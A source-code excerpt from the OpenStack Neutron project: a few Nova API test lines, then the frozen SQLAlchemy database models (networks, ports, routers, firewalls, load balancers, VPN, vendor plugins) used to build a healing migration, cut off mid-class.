subs['access_ip_v6'] = '80fe::'
self._verify_response('server-get-resp', subs, response, 200)
def test_detail(self):
uuid = self._post_server()
response = self._do_get('servers/detail')
subs = self._get_regexes()
subs['hostid'] = '[a-f0-9]+'
subs['id'] = uuid
subs['instance_name'] = r'instance-\d{8}'
subs['hypervisor_hostname'] = r'[\w\.\-]+'
subs['access_ip_v4'] = '1.2.3.4'
subs['access_ip_v6'] = '80fe::'
self._verify_response('servers-detail-resp', subs, response, 200)
| apache-2.0 |
miyakz1192/neutron | neutron/db/migration/models/frozen.py | 10 | 72451 | # Copyright (c) 2014 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
This module should not be changed.
The module provides all database models that were present at the moment
heal_script was created.
Its purpose is to create metadata comparable with the current database
schema. Based on this comparison, the database can be healed with a
healing migration.
Current HEAD commit is 59da928e945ec58836d34fd561d30a8a446e2728
"""
import sqlalchemy as sa
from sqlalchemy.ext import declarative
from sqlalchemy.ext.orderinglist import ordering_list
from sqlalchemy import orm
from sqlalchemy import schema
from neutron.db import model_base
from neutron.openstack.common import uuidutils
# Dictionary of all tables that were renamed:
# {new_table_name: old_table_name}
renamed_tables = {
'subnetroutes': 'routes',
'cisco_credentials': 'credentials',
'cisco_nexusport_bindings': 'nexusport_bindings',
'cisco_qos_policies': 'qoss',
'tz_network_bindings': 'nvp_network_bindings',
'multi_provider_networks': 'nvp_multi_provider_networks',
'net_partitions': 'nuage_net_partitions',
'net_partition_router_mapping': 'nuage_net_partition_router_mapping',
'router_zone_mapping': 'nuage_router_zone_mapping',
'subnet_l2dom_mapping': 'nuage_subnet_l2dom_mapping',
'port_mapping': 'nuage_port_mapping',
'routerroutes_mapping': 'nuage_routerroutes_mapping',
}
#neutron/plugins/ml2/drivers/mech_arista/db.py
UUID_LEN = 36
STR_LEN = 255
#neutron/plugins/cisco/common/cisco_constants.py
CISCO_CONSTANTS_NETWORK_TYPE_VLAN = 'vlan'
CISCO_CONSTANTS_NETWORK_TYPE_OVERLAY = 'overlay'
CISCO_CONSTANTS_NETWORK_TYPE_TRUNK = 'trunk'
CISCO_CONSTANTS_NETWORK_TYPE_MULTI_SEGMENT = 'multi-segment'
CISCO_CONSTANTS_NETWORK = 'network'
CISCO_CONSTANTS_POLICY = 'policy'
CISCO_CONSTANTS_TENANT_ID_NOT_SET = 'TENANT_ID_NOT_SET'
#neutron/plugins/ml2/models.py
BINDING_PROFILE_LEN = 4095
#neutron/extensions/portbindings.py
VNIC_NORMAL = 'normal'
#neutron/common/constants.py
IPV6_SLAAC = 'slaac'
DHCPV6_STATEFUL = 'dhcpv6-stateful'
DHCPV6_STATELESS = 'dhcpv6-stateless'
BASEV2 = declarative.declarative_base(cls=model_base.NeutronBaseV2)
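# Illustrative sketch (not from the original module): these frozen models
# are typically consumed by diffing BASEV2.metadata against a live schema,
# e.g. with alembic's autogenerate comparison (engine is assumed to be a
# SQLAlchemy engine bound to the database under inspection):
#
#   from alembic.autogenerate import compare_metadata
#   from alembic.migration import MigrationContext
#   mc = MigrationContext.configure(engine.connect())
#   diff = compare_metadata(mc, BASEV2.metadata)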
#neutron/db/models_v2.py
class HasTenant(object):
tenant_id = sa.Column(sa.String(255))
#neutron/db/models_v2.py
class HasId(object):
id = sa.Column(sa.String(36),
primary_key=True,
default=uuidutils.generate_uuid)
#neutron/db/models_v2.py
class HasStatusDescription(object):
status = sa.Column(sa.String(16), nullable=False)
status_description = sa.Column(sa.String(255))
#neutron/db/models_v2.py
class IPAvailabilityRange(BASEV2):
allocation_pool_id = sa.Column(sa.String(36),
sa.ForeignKey('ipallocationpools.id',
ondelete="CASCADE"),
nullable=False,
primary_key=True)
first_ip = sa.Column(sa.String(64), nullable=False, primary_key=True)
last_ip = sa.Column(sa.String(64), nullable=False, primary_key=True)
#neutron/db/models_v2.py
class IPAllocationPool(BASEV2, HasId):
subnet_id = sa.Column(sa.String(36), sa.ForeignKey('subnets.id',
ondelete="CASCADE"),
nullable=True)
first_ip = sa.Column(sa.String(64), nullable=False)
last_ip = sa.Column(sa.String(64), nullable=False)
available_ranges = orm.relationship(IPAvailabilityRange,
backref='ipallocationpool',
lazy="joined",
cascade='all, delete-orphan')
#neutron/db/models_v2.py
class IPAllocation(BASEV2):
port_id = sa.Column(sa.String(36), sa.ForeignKey('ports.id',
ondelete="CASCADE"),
nullable=True)
ip_address = sa.Column(sa.String(64), nullable=False, primary_key=True)
subnet_id = sa.Column(sa.String(36), sa.ForeignKey('subnets.id',
ondelete="CASCADE"),
nullable=False, primary_key=True)
network_id = sa.Column(sa.String(36), sa.ForeignKey("networks.id",
ondelete="CASCADE"),
nullable=False, primary_key=True)
#neutron/db/models_v2.py
class Route(object):
destination = sa.Column(sa.String(64), nullable=False, primary_key=True)
nexthop = sa.Column(sa.String(64), nullable=False, primary_key=True)
#neutron/db/models_v2.py
class SubnetRoute(BASEV2, Route):
subnet_id = sa.Column(sa.String(36),
sa.ForeignKey('subnets.id',
ondelete="CASCADE"),
primary_key=True)
#neutron/db/models_v2.py
class Port(BASEV2, HasId, HasTenant):
name = sa.Column(sa.String(255))
network_id = sa.Column(sa.String(36), sa.ForeignKey("networks.id"),
nullable=False)
fixed_ips = orm.relationship(IPAllocation, backref='ports', lazy='joined')
mac_address = sa.Column(sa.String(32), nullable=False)
admin_state_up = sa.Column(sa.Boolean(), nullable=False)
status = sa.Column(sa.String(16), nullable=False)
device_id = sa.Column(sa.String(255), nullable=False)
device_owner = sa.Column(sa.String(255), nullable=False)
#neutron/db/models_v2.py
class DNSNameServer(BASEV2):
address = sa.Column(sa.String(128), nullable=False, primary_key=True)
subnet_id = sa.Column(sa.String(36),
sa.ForeignKey('subnets.id',
ondelete="CASCADE"),
primary_key=True)
#neutron/db/models_v2.py
class Subnet(BASEV2, HasId, HasTenant):
name = sa.Column(sa.String(255))
network_id = sa.Column(sa.String(36), sa.ForeignKey('networks.id'))
ip_version = sa.Column(sa.Integer, nullable=False)
cidr = sa.Column(sa.String(64), nullable=False)
gateway_ip = sa.Column(sa.String(64))
allocation_pools = orm.relationship(IPAllocationPool,
backref='subnet',
lazy="joined",
cascade='delete')
enable_dhcp = sa.Column(sa.Boolean())
dns_nameservers = orm.relationship(DNSNameServer,
backref='subnet',
cascade='all, delete, delete-orphan')
routes = orm.relationship(SubnetRoute,
backref='subnet',
cascade='all, delete, delete-orphan')
shared = sa.Column(sa.Boolean)
ipv6_ra_mode = sa.Column(sa.Enum(IPV6_SLAAC,
DHCPV6_STATEFUL,
DHCPV6_STATELESS,
name='ipv6_ra_modes'), nullable=True)
ipv6_address_mode = sa.Column(sa.Enum(IPV6_SLAAC,
DHCPV6_STATEFUL,
DHCPV6_STATELESS,
name='ipv6_address_modes'),
nullable=True)
#neutron/db/models_v2.py
class Network(BASEV2, HasId, HasTenant):
name = sa.Column(sa.String(255))
ports = orm.relationship(Port, backref='networks')
subnets = orm.relationship(Subnet, backref='networks',
lazy="joined")
status = sa.Column(sa.String(16))
admin_state_up = sa.Column(sa.Boolean)
shared = sa.Column(sa.Boolean)
#neutron/db/agents_db.py
class Agent(BASEV2, HasId):
__table_args__ = (
sa.UniqueConstraint('agent_type', 'host',
name='uniq_agents0agent_type0host'),
)
agent_type = sa.Column(sa.String(255), nullable=False)
binary = sa.Column(sa.String(255), nullable=False)
topic = sa.Column(sa.String(255), nullable=False)
host = sa.Column(sa.String(255), nullable=False)
admin_state_up = sa.Column(sa.Boolean, default=True,
server_default=sa.sql.true(), nullable=False)
created_at = sa.Column(sa.DateTime, nullable=False)
started_at = sa.Column(sa.DateTime, nullable=False)
heartbeat_timestamp = sa.Column(sa.DateTime, nullable=False)
description = sa.Column(sa.String(255))
configurations = sa.Column(sa.String(4095), nullable=False)
#neutron/db/agentschedulers_db.py
class NetworkDhcpAgentBinding(BASEV2):
network_id = sa.Column(sa.String(36),
sa.ForeignKey("networks.id", ondelete='CASCADE'),
primary_key=True)
dhcp_agent = orm.relation(Agent)
dhcp_agent_id = sa.Column(sa.String(36),
sa.ForeignKey("agents.id",
ondelete='CASCADE'),
primary_key=True)
#neutron/db/allowedaddresspairs_db.py
class AllowedAddressPair(BASEV2):
port_id = sa.Column(sa.String(36),
sa.ForeignKey('ports.id', ondelete="CASCADE"),
primary_key=True)
mac_address = sa.Column(sa.String(32), nullable=False, primary_key=True)
ip_address = sa.Column(sa.String(64), nullable=False, primary_key=True)
port = orm.relationship(
Port,
backref=orm.backref("allowed_address_pairs",
lazy="joined", cascade="delete"))
#neutron/db/external_net_db.py
class ExternalNetwork(BASEV2):
network_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete="CASCADE"),
primary_key=True)
network = orm.relationship(
Network,
backref=orm.backref("external", lazy='joined',
uselist=False, cascade='delete'))
#neutron/db/extradhcpopt_db.py
class ExtraDhcpOpt(BASEV2, HasId):
port_id = sa.Column(sa.String(36),
sa.ForeignKey('ports.id', ondelete="CASCADE"),
nullable=False)
opt_name = sa.Column(sa.String(64), nullable=False)
opt_value = sa.Column(sa.String(255), nullable=False)
__table_args__ = (sa.UniqueConstraint('port_id',
'opt_name',
name='uidx_portid_optname'),
BASEV2.__table_args__,)
ports = orm.relationship(
Port,
backref=orm.backref("dhcp_opts", lazy='joined', cascade='delete'))
#neutron/db/l3_db.py
class Router(BASEV2, HasId, HasTenant):
name = sa.Column(sa.String(255))
status = sa.Column(sa.String(16))
admin_state_up = sa.Column(sa.Boolean)
gw_port_id = sa.Column(sa.String(36), sa.ForeignKey('ports.id'))
gw_port = orm.relationship(Port, lazy='joined')
enable_snat = sa.Column(sa.Boolean, default=True,
server_default=sa.sql.true(), nullable=False)
#neutron/db/l3_db.py
class FloatingIP(BASEV2, HasId, HasTenant):
floating_ip_address = sa.Column(sa.String(64), nullable=False)
floating_network_id = sa.Column(sa.String(36), nullable=False)
floating_port_id = sa.Column(sa.String(36), sa.ForeignKey('ports.id'),
nullable=False)
fixed_port_id = sa.Column(sa.String(36), sa.ForeignKey('ports.id'))
fixed_ip_address = sa.Column(sa.String(64))
router_id = sa.Column(sa.String(36), sa.ForeignKey('routers.id'))
last_known_router_id = sa.Column(sa.String(36))
status = sa.Column(sa.String(16))
#neutron/db/extraroute_db.py
class RouterRoute(BASEV2, Route):
router_id = sa.Column(sa.String(36),
sa.ForeignKey('routers.id',
ondelete="CASCADE"),
primary_key=True)
router = orm.relationship(Router,
backref=orm.backref("route_list",
lazy='joined',
cascade='delete'))
#neutron/db/servicetype_db.py
class ProviderResourceAssociation(BASEV2):
provider_name = sa.Column(sa.String(255),
nullable=False, primary_key=True)
resource_id = sa.Column(sa.String(36), nullable=False, primary_key=True,
unique=True)
#neutron/db/firewall/firewall_db.py
class FirewallRule(BASEV2, HasId, HasTenant):
__tablename__ = 'firewall_rules'
name = sa.Column(sa.String(255))
description = sa.Column(sa.String(1024))
firewall_policy_id = sa.Column(sa.String(36),
sa.ForeignKey('firewall_policies.id'),
nullable=True)
shared = sa.Column(sa.Boolean)
protocol = sa.Column(sa.String(40))
ip_version = sa.Column(sa.Integer, nullable=False)
source_ip_address = sa.Column(sa.String(46))
destination_ip_address = sa.Column(sa.String(46))
source_port_range_min = sa.Column(sa.Integer)
source_port_range_max = sa.Column(sa.Integer)
destination_port_range_min = sa.Column(sa.Integer)
destination_port_range_max = sa.Column(sa.Integer)
action = sa.Column(sa.Enum('allow', 'deny', name='firewallrules_action'))
enabled = sa.Column(sa.Boolean)
position = sa.Column(sa.Integer)
#neutron/db/firewall/firewall_db.py
class Firewall(BASEV2, HasId, HasTenant):
__tablename__ = 'firewalls'
name = sa.Column(sa.String(255))
description = sa.Column(sa.String(1024))
shared = sa.Column(sa.Boolean)
admin_state_up = sa.Column(sa.Boolean)
status = sa.Column(sa.String(16))
firewall_policy_id = sa.Column(sa.String(36),
sa.ForeignKey('firewall_policies.id'),
nullable=True)
#neutron/db/firewall/firewall_db.py
class FirewallPolicy(BASEV2, HasId, HasTenant):
__tablename__ = 'firewall_policies'
name = sa.Column(sa.String(255))
description = sa.Column(sa.String(1024))
shared = sa.Column(sa.Boolean)
firewall_rules = orm.relationship(
FirewallRule,
backref=orm.backref('firewall_policies', cascade='all, delete'),
order_by='FirewallRule.position',
collection_class=ordering_list('position', count_from=1))
audited = sa.Column(sa.Boolean)
firewalls = orm.relationship(Firewall, backref='firewall_policies')
#neutron/db/l3_agentschedulers_db.py
class RouterL3AgentBinding(BASEV2, HasId):
router_id = sa.Column(sa.String(36),
sa.ForeignKey("routers.id", ondelete='CASCADE'))
l3_agent = orm.relation(Agent)
l3_agent_id = sa.Column(sa.String(36),
sa.ForeignKey("agents.id",
ondelete='CASCADE'))
#neutron/db/loadbalancer/loadbalancer_db.py
class SessionPersistence(BASEV2):
vip_id = sa.Column(sa.String(36),
sa.ForeignKey("vips.id"),
primary_key=True)
type = sa.Column(sa.Enum("SOURCE_IP",
"HTTP_COOKIE",
"APP_COOKIE",
name="sesssionpersistences_type"),
nullable=False)
cookie_name = sa.Column(sa.String(1024))
#neutron/db/loadbalancer/loadbalancer_db.py
class PoolStatistics(BASEV2):
pool_id = sa.Column(sa.String(36), sa.ForeignKey("pools.id"),
primary_key=True)
bytes_in = sa.Column(sa.BigInteger, nullable=False)
bytes_out = sa.Column(sa.BigInteger, nullable=False)
active_connections = sa.Column(sa.BigInteger, nullable=False)
total_connections = sa.Column(sa.BigInteger, nullable=False)
#neutron/db/loadbalancer/loadbalancer_db.py
class Vip(BASEV2, HasId, HasTenant, HasStatusDescription):
name = sa.Column(sa.String(255))
description = sa.Column(sa.String(255))
port_id = sa.Column(sa.String(36), sa.ForeignKey('ports.id'))
protocol_port = sa.Column(sa.Integer, nullable=False)
protocol = sa.Column(sa.Enum("HTTP", "HTTPS", "TCP", name="lb_protocols"),
nullable=False)
pool_id = sa.Column(sa.String(36), nullable=False, unique=True)
session_persistence = orm.relationship(SessionPersistence,
uselist=False,
backref="vips",
cascade="all, delete-orphan")
admin_state_up = sa.Column(sa.Boolean(), nullable=False)
connection_limit = sa.Column(sa.Integer)
port = orm.relationship(Port)
#neutron/db/loadbalancer/loadbalancer_db.py
class Member(BASEV2, HasId, HasTenant, HasStatusDescription):
__table_args__ = (
sa.schema.UniqueConstraint('pool_id', 'address', 'protocol_port',
name='uniq_member0pool_id0address0port'),
)
pool_id = sa.Column(sa.String(36), sa.ForeignKey("pools.id"),
nullable=False)
address = sa.Column(sa.String(64), nullable=False)
protocol_port = sa.Column(sa.Integer, nullable=False)
weight = sa.Column(sa.Integer, nullable=False)
admin_state_up = sa.Column(sa.Boolean(), nullable=False)
#neutron/db/loadbalancer/loadbalancer_db.py
class Pool(BASEV2, HasId, HasTenant, HasStatusDescription):
vip_id = sa.Column(sa.String(36), sa.ForeignKey("vips.id"))
name = sa.Column(sa.String(255))
description = sa.Column(sa.String(255))
subnet_id = sa.Column(sa.String(36), nullable=False)
protocol = sa.Column(sa.Enum("HTTP", "HTTPS", "TCP", name="lb_protocols"),
nullable=False)
lb_method = sa.Column(sa.Enum("ROUND_ROBIN",
"LEAST_CONNECTIONS",
"SOURCE_IP",
name="pools_lb_method"),
nullable=False)
admin_state_up = sa.Column(sa.Boolean(), nullable=False)
stats = orm.relationship(PoolStatistics,
uselist=False,
backref="pools",
cascade="all, delete-orphan")
members = orm.relationship(Member, backref="pools",
cascade="all, delete-orphan")
monitors = orm.relationship("PoolMonitorAssociation", backref="pools",
cascade="all, delete-orphan")
vip = orm.relationship(Vip, backref='pool')
provider = orm.relationship(
ProviderResourceAssociation,
uselist=False,
lazy="joined",
primaryjoin="Pool.id==ProviderResourceAssociation.resource_id",
foreign_keys=[ProviderResourceAssociation.resource_id]
)
#neutron/db/loadbalancer/loadbalancer_db.py
class HealthMonitor(BASEV2, HasId, HasTenant):
type = sa.Column(sa.Enum("PING", "TCP", "HTTP", "HTTPS",
name="healthmontiors_type"),
nullable=False)
delay = sa.Column(sa.Integer, nullable=False)
timeout = sa.Column(sa.Integer, nullable=False)
max_retries = sa.Column(sa.Integer, nullable=False)
http_method = sa.Column(sa.String(16))
url_path = sa.Column(sa.String(255))
expected_codes = sa.Column(sa.String(64))
admin_state_up = sa.Column(sa.Boolean(), nullable=False)
pools = orm.relationship(
"PoolMonitorAssociation", backref="healthmonitor",
cascade="all", lazy="joined"
)
#neutron/db/loadbalancer/loadbalancer_db.py
class PoolMonitorAssociation(BASEV2, HasStatusDescription):
pool_id = sa.Column(sa.String(36),
sa.ForeignKey("pools.id"),
primary_key=True)
monitor_id = sa.Column(sa.String(36),
sa.ForeignKey("healthmonitors.id"),
primary_key=True)
#neutron/db/metering/metering_db.py
class MeteringLabelRule(BASEV2, HasId):
direction = sa.Column(sa.Enum('ingress', 'egress',
name='meteringlabels_direction'))
remote_ip_prefix = sa.Column(sa.String(64))
metering_label_id = sa.Column(sa.String(36),
sa.ForeignKey("meteringlabels.id",
ondelete="CASCADE"),
nullable=False)
excluded = sa.Column(sa.Boolean, default=False,
server_default=sa.sql.false())
#neutron/db/metering/metering_db.py
class MeteringLabel(BASEV2, HasId, HasTenant):
name = sa.Column(sa.String(255))
description = sa.Column(sa.String(1024))
rules = orm.relationship(MeteringLabelRule, backref="label",
cascade="delete", lazy="joined")
routers = orm.relationship(
Router,
primaryjoin="MeteringLabel.tenant_id==Router.tenant_id",
foreign_keys='MeteringLabel.tenant_id',
uselist=True)
#neutron/db/portbindings_db.py
class PortBindingPort(BASEV2):
port_id = sa.Column(sa.String(36),
sa.ForeignKey('ports.id', ondelete="CASCADE"),
primary_key=True)
host = sa.Column(sa.String(255), nullable=False)
port = orm.relationship(
Port,
backref=orm.backref("portbinding",
lazy='joined', uselist=False,
cascade='delete'))
#neutron/db/portsecurity_db.py
class PortSecurityBinding(BASEV2):
port_id = sa.Column(sa.String(36),
sa.ForeignKey('ports.id', ondelete="CASCADE"),
primary_key=True)
port_security_enabled = sa.Column(sa.Boolean(), nullable=False)
port = orm.relationship(
Port,
backref=orm.backref("port_security", uselist=False,
cascade='delete', lazy='joined'))
#neutron/db/portsecurity_db.py
class NetworkSecurityBinding(BASEV2):
network_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete="CASCADE"),
primary_key=True)
port_security_enabled = sa.Column(sa.Boolean(), nullable=False)
network = orm.relationship(
Network,
backref=orm.backref("port_security", uselist=False,
cascade='delete', lazy='joined'))
#neutron/db/quota_db.py
class Quota(BASEV2, HasId):
tenant_id = sa.Column(sa.String(255), index=True)
resource = sa.Column(sa.String(255))
limit = sa.Column(sa.Integer)
#neutron/db/routedserviceinsertion_db.py
class ServiceRouterBinding(BASEV2):
resource_id = sa.Column(sa.String(36),
primary_key=True)
resource_type = sa.Column(sa.String(36),
primary_key=True)
router_id = sa.Column(sa.String(36),
sa.ForeignKey('routers.id'),
nullable=False)
#neutron/db/routerservicetype_db.py
class RouterServiceTypeBinding(BASEV2):
router_id = sa.Column(sa.String(36),
sa.ForeignKey('routers.id', ondelete="CASCADE"),
primary_key=True)
service_type_id = sa.Column(sa.String(36),
nullable=False)
#neutron/db/securitygroups_db.py
class SecurityGroup(BASEV2, HasId, HasTenant):
name = sa.Column(sa.String(255))
description = sa.Column(sa.String(255))
#neutron/db/securitygroups_db.py
class SecurityGroupPortBinding(BASEV2):
port_id = sa.Column(sa.String(36),
sa.ForeignKey("ports.id",
ondelete='CASCADE'),
primary_key=True)
security_group_id = sa.Column(sa.String(36),
sa.ForeignKey("securitygroups.id"),
primary_key=True)
# Add a relationship to the Port model in order to instruct SQLAlchemy to
# eagerly load security group bindings
ports = orm.relationship(
Port,
backref=orm.backref("security_groups",
lazy='joined', cascade='delete'))
#neutron/db/securitygroups_db.py
class SecurityGroupRule(BASEV2, HasId,
HasTenant):
security_group_id = sa.Column(sa.String(36),
sa.ForeignKey("securitygroups.id",
ondelete="CASCADE"),
nullable=False)
remote_group_id = sa.Column(sa.String(36),
sa.ForeignKey("securitygroups.id",
ondelete="CASCADE"),
nullable=True)
direction = sa.Column(sa.Enum('ingress', 'egress',
name='securitygrouprules_direction'))
ethertype = sa.Column(sa.String(40))
protocol = sa.Column(sa.String(40))
port_range_min = sa.Column(sa.Integer)
port_range_max = sa.Column(sa.Integer)
remote_ip_prefix = sa.Column(sa.String(255))
security_group = orm.relationship(
SecurityGroup,
backref=orm.backref('rules', cascade='all,delete'),
primaryjoin="SecurityGroup.id==SecurityGroupRule.security_group_id")
source_group = orm.relationship(
SecurityGroup,
backref=orm.backref('source_rules', cascade='all,delete'),
primaryjoin="SecurityGroup.id==SecurityGroupRule.remote_group_id")
#neutron/db/vpn/vpn_db.py
class IPsecPeerCidr(BASEV2):
cidr = sa.Column(sa.String(32), nullable=False, primary_key=True)
ipsec_site_connection_id = sa.Column(
sa.String(36),
sa.ForeignKey('ipsec_site_connections.id',
ondelete="CASCADE"),
primary_key=True)
#neutron/db/vpn/vpn_db.py
class IPsecPolicy(BASEV2, HasId, HasTenant):
__tablename__ = 'ipsecpolicies'
name = sa.Column(sa.String(255))
description = sa.Column(sa.String(255))
transform_protocol = sa.Column(sa.Enum("esp", "ah", "ah-esp",
name="ipsec_transform_protocols"),
nullable=False)
auth_algorithm = sa.Column(sa.Enum("sha1",
name="vpn_auth_algorithms"),
nullable=False)
encryption_algorithm = sa.Column(sa.Enum("3des", "aes-128",
"aes-256", "aes-192",
name="vpn_encrypt_algorithms"),
nullable=False)
encapsulation_mode = sa.Column(sa.Enum("tunnel", "transport",
name="ipsec_encapsulations"),
nullable=False)
lifetime_units = sa.Column(sa.Enum("seconds", "kilobytes",
name="vpn_lifetime_units"),
nullable=False)
lifetime_value = sa.Column(sa.Integer, nullable=False)
pfs = sa.Column(sa.Enum("group2", "group5", "group14",
name="vpn_pfs"), nullable=False)
#neutron/db/vpn/vpn_db.py
class IKEPolicy(BASEV2, HasId, HasTenant):
__tablename__ = 'ikepolicies'
name = sa.Column(sa.String(255))
description = sa.Column(sa.String(255))
auth_algorithm = sa.Column(sa.Enum("sha1",
name="vpn_auth_algorithms"),
nullable=False)
encryption_algorithm = sa.Column(sa.Enum("3des", "aes-128",
"aes-256", "aes-192",
name="vpn_encrypt_algorithms"),
nullable=False)
phase1_negotiation_mode = sa.Column(sa.Enum("main",
name="ike_phase1_mode"),
nullable=False)
lifetime_units = sa.Column(sa.Enum("seconds", "kilobytes",
name="vpn_lifetime_units"),
nullable=False)
lifetime_value = sa.Column(sa.Integer, nullable=False)
ike_version = sa.Column(sa.Enum("v1", "v2", name="ike_versions"),
nullable=False)
pfs = sa.Column(sa.Enum("group2", "group5", "group14",
name="vpn_pfs"), nullable=False)
#neutron/db/vpn/vpn_db.py
class IPsecSiteConnection(BASEV2,
HasId, HasTenant):
__tablename__ = 'ipsec_site_connections'
name = sa.Column(sa.String(255))
description = sa.Column(sa.String(255))
peer_address = sa.Column(sa.String(255), nullable=False)
peer_id = sa.Column(sa.String(255), nullable=False)
route_mode = sa.Column(sa.String(8), nullable=False)
mtu = sa.Column(sa.Integer, nullable=False)
initiator = sa.Column(sa.Enum("bi-directional", "response-only",
name="vpn_initiators"), nullable=False)
auth_mode = sa.Column(sa.String(16), nullable=False)
psk = sa.Column(sa.String(255), nullable=False)
dpd_action = sa.Column(sa.Enum("hold", "clear",
"restart", "disabled",
"restart-by-peer", name="vpn_dpd_actions"),
nullable=False)
dpd_interval = sa.Column(sa.Integer, nullable=False)
dpd_timeout = sa.Column(sa.Integer, nullable=False)
status = sa.Column(sa.String(16), nullable=False)
admin_state_up = sa.Column(sa.Boolean(), nullable=False)
vpnservice_id = sa.Column(sa.String(36),
sa.ForeignKey('vpnservices.id'),
nullable=False)
ipsecpolicy_id = sa.Column(sa.String(36),
sa.ForeignKey('ipsecpolicies.id'),
nullable=False)
ikepolicy_id = sa.Column(sa.String(36),
sa.ForeignKey('ikepolicies.id'),
nullable=False)
ipsecpolicy = orm.relationship(
IPsecPolicy, backref='ipsec_site_connection')
ikepolicy = orm.relationship(IKEPolicy, backref='ipsec_site_connection')
peer_cidrs = orm.relationship(IPsecPeerCidr,
backref='ipsec_site_connection',
lazy='joined',
cascade='all, delete, delete-orphan')
#neutron/db/vpn/vpn_db.py
class VPNService(BASEV2, HasId, HasTenant):
name = sa.Column(sa.String(255))
description = sa.Column(sa.String(255))
status = sa.Column(sa.String(16), nullable=False)
admin_state_up = sa.Column(sa.Boolean(), nullable=False)
subnet_id = sa.Column(sa.String(36), sa.ForeignKey('subnets.id'),
nullable=False)
router_id = sa.Column(sa.String(36), sa.ForeignKey('routers.id'),
nullable=False)
subnet = orm.relationship(Subnet)
router = orm.relationship(Router)
ipsec_site_connections = orm.relationship(
IPsecSiteConnection,
backref='vpnservice',
cascade="all, delete-orphan")
#neutron/plugins/bigswitch/db/consistency_db.py
class ConsistencyHash(BASEV2):
__tablename__ = 'consistencyhashes'
hash_id = sa.Column(sa.String(255),
primary_key=True)
hash = sa.Column(sa.String(255), nullable=False)
#neutron/plugins/bigswitch/routerrule_db.py
class RouterRule(BASEV2):
id = sa.Column(sa.Integer, primary_key=True)
source = sa.Column(sa.String(64), nullable=False)
destination = sa.Column(sa.String(64), nullable=False)
nexthops = orm.relationship('NextHop', cascade='all,delete')
action = sa.Column(sa.String(10), nullable=False)
router_id = sa.Column(sa.String(36),
sa.ForeignKey('routers.id',
ondelete="CASCADE"))
#neutron/plugins/bigswitch/routerrule_db.py
class NextHop(BASEV2):
rule_id = sa.Column(sa.Integer,
sa.ForeignKey('routerrules.id',
ondelete="CASCADE"),
primary_key=True)
nexthop = sa.Column(sa.String(64), nullable=False, primary_key=True)
#neutron/plugins/brocade/db/models.py
class BrocadeNetwork(BASEV2, HasId):
vlan = sa.Column(sa.String(10))
#neutron/plugins/brocade/db/models.py
class BrocadePort(BASEV2):
port_id = sa.Column(sa.String(36), primary_key=True, default="",
server_default='')
network_id = sa.Column(sa.String(36),
sa.ForeignKey("brocadenetworks.id"),
nullable=False)
admin_state_up = sa.Column(sa.Boolean, nullable=False)
physical_interface = sa.Column(sa.String(36))
vlan_id = sa.Column(sa.String(36))
tenant_id = sa.Column(sa.String(36))
#neutron/plugins/cisco/db/n1kv_models_v2.py
class N1kvVlanAllocation(BASEV2):
__tablename__ = 'cisco_n1kv_vlan_allocations'
physical_network = sa.Column(sa.String(64),
nullable=False,
primary_key=True)
vlan_id = sa.Column(sa.Integer, nullable=False, primary_key=True,
autoincrement=False)
allocated = sa.Column(sa.Boolean, nullable=False, default=False,
server_default=sa.sql.false())
network_profile_id = sa.Column(sa.String(36),
sa.ForeignKey('cisco_network_profiles.id',
ondelete="CASCADE"),
nullable=False)
#neutron/plugins/cisco/db/n1kv_models_v2.py
class N1kvVxlanAllocation(BASEV2):
__tablename__ = 'cisco_n1kv_vxlan_allocations'
vxlan_id = sa.Column(sa.Integer, nullable=False, primary_key=True,
autoincrement=False)
allocated = sa.Column(sa.Boolean, nullable=False, default=False,
server_default=sa.sql.false())
network_profile_id = sa.Column(sa.String(36),
sa.ForeignKey('cisco_network_profiles.id',
ondelete="CASCADE"),
nullable=False)
#neutron/plugins/cisco/db/n1kv_models_v2.py
class N1kvPortBinding(BASEV2):
__tablename__ = 'cisco_n1kv_port_bindings'
port_id = sa.Column(sa.String(36),
sa.ForeignKey('ports.id', ondelete="CASCADE"),
primary_key=True)
profile_id = sa.Column(sa.String(36),
sa.ForeignKey('cisco_policy_profiles.id'))
#neutron/plugins/cisco/db/n1kv_models_v2.py
class N1kvNetworkBinding(BASEV2):
__tablename__ = 'cisco_n1kv_network_bindings'
network_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete="CASCADE"),
primary_key=True)
network_type = sa.Column(sa.String(32), nullable=False)
physical_network = sa.Column(sa.String(64))
segmentation_id = sa.Column(sa.Integer)
multicast_ip = sa.Column(sa.String(32))
profile_id = sa.Column(sa.String(36),
sa.ForeignKey('cisco_network_profiles.id'))
#neutron/plugins/cisco/db/n1kv_models_v2.py
class N1kVmNetwork(BASEV2):
__tablename__ = 'cisco_n1kv_vmnetworks'
name = sa.Column(sa.String(80), primary_key=True)
profile_id = sa.Column(sa.String(36),
sa.ForeignKey('cisco_policy_profiles.id'))
network_id = sa.Column(sa.String(36))
port_count = sa.Column(sa.Integer)
#neutron/plugins/cisco/db/n1kv_models_v2.py
class NetworkProfile(BASEV2, HasId):
__tablename__ = 'cisco_network_profiles'
name = sa.Column(sa.String(255))
segment_type = sa.Column(
sa.Enum(CISCO_CONSTANTS_NETWORK_TYPE_VLAN,
CISCO_CONSTANTS_NETWORK_TYPE_OVERLAY,
CISCO_CONSTANTS_NETWORK_TYPE_TRUNK,
CISCO_CONSTANTS_NETWORK_TYPE_MULTI_SEGMENT,
name='segment_type'),
nullable=False)
sub_type = sa.Column(sa.String(255))
segment_range = sa.Column(sa.String(255))
multicast_ip_index = sa.Column(sa.Integer, default=0,
server_default='0')
multicast_ip_range = sa.Column(sa.String(255))
physical_network = sa.Column(sa.String(255))
#neutron/plugins/cisco/db/n1kv_models_v2.py
class PolicyProfile(BASEV2):
__tablename__ = 'cisco_policy_profiles'
id = sa.Column(sa.String(36), primary_key=True)
name = sa.Column(sa.String(255))
#neutron/plugins/cisco/db/n1kv_models_v2.py
class ProfileBinding(BASEV2):
__tablename__ = 'cisco_n1kv_profile_bindings'
